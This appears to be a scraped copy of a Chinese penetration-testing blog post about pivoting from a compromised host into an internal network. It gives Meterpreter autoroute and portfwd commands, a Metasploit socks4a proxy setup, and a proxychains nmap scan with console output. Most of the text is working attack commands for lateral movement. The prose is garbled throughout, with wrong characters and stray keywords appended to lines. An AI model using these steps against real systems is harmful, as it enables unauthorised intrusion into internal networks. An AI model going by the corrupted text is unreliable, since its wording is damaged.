最近,拿到一台内网机器, 苦于没法使用nmap扫描改主机的内网, 因此才有此文html
在跳板机子获取必定权限后,须要积极的向内网主机权限发展,获取指定的目标信息,探查系统漏洞,借助msf已经获得的meterpreter后门,可使系列的操做更容易。web
使用Meterpreter 内置的添加路由功能浏览器
run get_local_subnets
run post/multi/manage/autoroute
/*
或者使用 run autoroute -s 10.0.0.0 -n 255.0.0.0
-s 参数为网关 -n 参数为只掩码
*/
run autoroute -p
虽然路由表已经添加了, 可是咱们直接ping 内网的主机是无法ping通的ruby
为了实现nmap扫描,metasploit中的路由配置须要被激活,而且须要经过socks4代理进行流量转发。Metasploit中存在这样的模块知足需求。
使用Metasploit中的socks4代理模块:网络
meterpreter > background [*] Backgrounding session 2... msf > use auxiliary/server/socks4a msf auxiliary(socks4a) > show options Module options (auxiliary/server/socks4a): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The address to listen on SRVPORT 1080 yes The port to listen on. Auxiliary action: Name Description ---- ----------- Proxy msf auxiliary(socks4a) > set srvhost 192.168.1.11 srvhost => 192.168.1.11 msf auxiliary(socks4a) > run [*] Auxiliary module execution completed [*] Starting the socks4a proxy server msf auxiliary(socks4a) > netstat -antp | grep 1080 [*] exec: netstat -antp | grep 1080 tcp 0 172.16.0.20:1080 0.0.0.0:* LISTEN 3626/ruby msf auxiliary(socks4a) >
使用GNU\Linux操做系统内置的ProxyChains工具,任何TCP链接都能经过TOR、SCOKS四、SOCKS、HTTP/HTTPS等代理方式进行转发。在这项隧道技术中,能够嵌套多层代理。除了提供匿名性之外,如跳板机这样的利用也能实现向隔离的内部网络导入流量。session
使用编辑器在文件/etc/proxychains.conf的最后一行加入socks4代理的配置信息。tcp
--- snippet --- [ProxyList] # add proxy here ... # meanwile # defaults set to "tor" #socks4 127.0.0.1 9050 socks4 192.168.1.11 1080
经过proxychains执行nmap扫描是一个简单的操做。流量包会经过定义的代理端口被导入到目标网络.编辑器
root@kali:~# proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 192.168.100.199ProxyChains-3.1 (http://proxychains.sf.net) Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-12 04:17 EDT |S-chain|-<>-192.168.1.11:1080-<><>-192.168.100.199:22-<><>-OK |S-chain|-<>-192.168.1.11:1080-<><>-192.168.100.199:80-<><>-OK |S-chain|-<>-192.168.1.11:1080-<><>-192.168.100.199:445-<--timeout |S-chain|-<>-192.168.1.11:1080-<><>-192.168.100.199:135-<--timeout |S-chain|-<>-192.168.1.11:1080-<><>-192.168.100.199:139-<--timeout |S-chain|-<>-192.168.1.11:1080-<><>-192.168.100.199:22-<><>-OK |S-chain|-<>-192.168.1.11:1080-<><>-192.168.100.199:80-
能够看到192.168.100.199开启了web服务, 咱们直接在浏览器中配置firefox代理(192.168.1.11 1080), 直接访问web服务:工具
此前经过nmap和proxychains,咱们已经发现192.168.100.99的主机时在TCP 80端口运行了web服务。为了可以访问这个服务,本地系统的2323端口应该被路由至192.168.100.99的80端口.post
meterpreter > portfwd add -L 192.168.1.11 -l 2323 -p 80 -r 192.168.100.99 [*] Local TCP relay created: 192.168.1.11:2323 <-> 192.168.100.99:80 meterpreter > portfwd Active Port Forwards ==================== Index Local Remote Direction ----- ----- ------ --------- 1 192.168.1.11:2323 192.168.100.99:80 Forward 1 total active port forwards.
总的来讲很卡。。。
内网渗透随想 http://www.91ri.org/14390.html
经过双重跳板漫游隔离内网 https://xz.aliyun.com/t/249